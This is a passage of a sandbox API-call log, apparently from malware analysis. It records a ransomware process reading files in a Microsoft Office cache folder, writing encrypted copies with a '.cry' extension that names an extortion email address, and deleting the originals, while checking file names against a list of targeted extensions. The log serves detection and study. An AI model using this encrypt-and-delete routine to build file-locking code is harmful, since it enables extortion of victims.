lpNewFilePointer=0x0) returned 1 [0035.672] SetEndOfFile (hFile=0x188) returned 1 [0035.673] CloseHandle (hObject=0x188) returned 1 [0035.673] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.673] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 1 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.674] lstrlenW (lpString=".doc") returned 4 [0035.674] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString=".docx") returned 5 [0035.674] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.674] lstrlenW (lpString=".pdf") returned 4 [0035.674] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString=".xls") returned 4 [0035.674] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString=".xlsx") returned 5 [0035.674] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.674] lstrlenW (lpString=".ppt") returned 4 [0035.674] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.674] lstrlenW (lpString=".zip") returned 4 [0035.674] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.674] lstrlenW (lpString=".rar") returned 4 [0035.674] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString=".bz2") returned 4 [0035.674] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString=".7z") returned 3 [0035.674] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.674] lstrlenW (lpString=".dbf") returned 4 [0035.674] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.674] lstrlenW (lpString=".1cd") returned 4 [0035.674] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.674] lstrlenW (lpString=".jpg") returned 4 [0035.674] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.674] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.674] lstrlenW (lpString=".doc") returned 4 [0035.674] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString=".docx") returned 5 [0035.675] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.675] lstrlenW (lpString=".pdf") returned 4 [0035.675] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString=".xls") returned 4 [0035.675] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString=".xlsx") returned 5 [0035.675] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.675] lstrlenW (lpString=".ppt") returned 4 [0035.675] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.675] lstrlenW (lpString=".zip") returned 4 [0035.675] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.675] lstrlenW (lpString=".rar") returned 4 [0035.675] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString=".bz2") returned 4 [0035.675] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString=".7z") returned 3 [0035.675] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.675] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.675] lstrlenW (lpString=".dbf") returned 4 [0035.675] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.675] lstrlenW (lpString=".1cd") returned 4 [0035.675] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.675] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.675] lstrlenW (lpString=".jpg") returned 4 [0035.675] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.675] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.675] lstrlenW (lpString="Setup.xml") returned 9 [0035.675] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.676] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=5884) returned 1 [0035.676] CloseHandle (hObject=0x188) returned 1 [0035.676] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.676] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.676] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.676] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.676] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.676] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.676] GetLastError () returned 0x0 [0035.676] ReadFile (in: hFile=0x188, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x16fc, lpOverlapped=0x0) returned 1 [0035.806] WriteFile (in: hFile=0x19c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1700, lpOverlapped=0x0) returned 1 [0035.807] ReadFile (in: hFile=0x188, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0035.807] WriteFile (in: hFile=0x19c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.807] SetEndOfFile (hFile=0x19c) returned 1 [0035.807] CloseHandle (hObject=0x19c) returned 1 [0035.808] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.808] SetEndOfFile (hFile=0x188) returned 1 [0035.808] CloseHandle (hObject=0x188) returned 1 [0035.808] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.809] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.809] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.809] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.809] lstrlenW (lpString=".doc") returned 4 [0035.809] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.809] lstrlenW (lpString=".docx") returned 5 [0035.809] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.809] lstrlenW (lpString=".pdf") returned 4 [0035.809] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.809] lstrlenW (lpString=".xls") returned 4 [0035.809] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.809] lstrlenW (lpString=".xlsx") returned 5 [0035.809] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.809] lstrlenW (lpString=".ppt") returned 4 [0035.809] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.809] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.809] lstrlenW (lpString=".zip") returned 4 [0035.809] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.809] lstrlenW (lpString=".rar") returned 4 [0035.809] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.809] lstrlenW (lpString=".bz2") returned 4 [0035.809] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.809] lstrlenW (lpString=".7z") returned 3 [0035.809] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.809] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.809] lstrlenW (lpString=".dbf") returned 4 [0035.809] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.809] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.809] lstrlenW (lpString=".1cd") returned 4 [0035.809] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.809] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.810] lstrlenW (lpString=".jpg") returned 4 [0035.810] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.810] lstrlenW (lpString=".doc") returned 4 [0035.810] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.810] lstrlenW (lpString=".docx") returned 5 [0035.810] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.810] lstrlenW (lpString=".pdf") returned 4 [0035.810] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.810] lstrlenW (lpString=".xls") returned 4 [0035.810] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.810] lstrlenW (lpString=".xlsx") returned 5 [0035.810] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.810] lstrlenW (lpString=".ppt") returned 4 [0035.810] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.810] lstrlenW (lpString=".zip") returned 4 [0035.810] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.810] lstrlenW (lpString=".rar") returned 4 [0035.810] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.810] lstrlenW (lpString=".bz2") returned 4 [0035.810] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.810] lstrlenW (lpString=".7z") returned 3 [0035.810] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.810] lstrlenW (lpString=".dbf") returned 4 [0035.810] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.810] lstrlenW (lpString=".1cd") returned 4 [0035.810] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.810] lstrlenW (lpString=".jpg") returned 4 [0035.810] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.811] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.811] lstrlenW (lpString="Setup.xml") returned 9 [0035.811] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.811] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1852) returned 1 [0035.811] CloseHandle (hObject=0x188) returned 1 [0035.811] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.811] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.811] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.811] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.811] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.811] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.811] GetLastError () returned 0x0 [0035.812] ReadFile (in: hFile=0x188, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x73c, lpOverlapped=0x0) returned 1 [0035.894] WriteFile (in: hFile=0x19c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x740, lpOverlapped=0x0) returned 1 [0035.895] ReadFile (in: hFile=0x188, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0035.895] WriteFile (in: hFile=0x19c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.895] SetEndOfFile (hFile=0x19c) returned 1 [0035.896] CloseHandle (hObject=0x19c) returned 1 [0035.897] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.897] SetEndOfFile (hFile=0x188) returned 1 [0035.897] CloseHandle (hObject=0x188) returned 1 [0035.898] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.898] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.898] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.898] lstrlenW (lpString=".doc") returned 4 [0035.898] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.898] lstrlenW (lpString=".docx") returned 5 [0035.898] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.898] lstrlenW (lpString=".pdf") returned 4 [0035.898] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.898] lstrlenW (lpString=".xls") returned 4 [0035.899] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.899] lstrlenW (lpString=".xlsx") returned 5 [0035.899] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.899] lstrlenW (lpString=".ppt") returned 4 [0035.899] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.899] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.899] lstrlenW (lpString=".zip") returned 4 [0035.899] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.899] lstrlenW (lpString=".rar") returned 4 [0035.899] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.899] lstrlenW (lpString=".bz2") returned 4 [0035.899] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.899] lstrlenW (lpString=".7z") returned 3 [0035.899] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.899] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.899] lstrlenW (lpString=".dbf") returned 4 [0035.899] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.899] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.900] lstrlenW (lpString=".1cd") returned 4 [0035.900] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.900] lstrlenW (lpString=".jpg") returned 4 [0035.900] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.900] lstrlenW (lpString=".doc") returned 4 [0035.900] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.900] lstrlenW (lpString=".docx") returned 5 [0035.900] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.900] lstrlenW (lpString=".pdf") returned 4 [0035.900] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.900] lstrlenW (lpString=".xls") returned 4 [0035.900] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.900] lstrlenW (lpString=".xlsx") returned 5 [0035.900] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.900] lstrlenW (lpString=".ppt") returned 4 [0035.900] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.900] lstrlenW (lpString=".zip") returned 4 [0035.900] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.900] lstrlenW (lpString=".rar") returned 4 [0035.900] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.900] lstrlenW (lpString=".bz2") returned 4 [0035.900] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.900] lstrlenW (lpString=".7z") returned 3 [0035.900] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.900] lstrlenW (lpString=".dbf") returned 4 [0035.900] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.900] lstrlenW (lpString=".1cd") returned 4 [0035.900] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.901] lstrlenW (lpString=".jpg") returned 4 [0035.901] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.901] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.901] lstrlenW (lpString="Setup.xml") returned 9 [0035.901] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.995] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1988) returned 1 [0035.995] CloseHandle (hObject=0x180) returned 1 [0035.995] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.995] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.995] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.995] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.995] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.995] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0035.995] GetLastError () returned 0x0 [0035.995] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x7c4, lpOverlapped=0x0) returned 1 [0036.008] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x7d0, lpOverlapped=0x0) returned 1 [0036.009] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0036.009] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.009] SetEndOfFile (hFile=0x184) returned 1 [0036.009] CloseHandle (hObject=0x184) returned 1 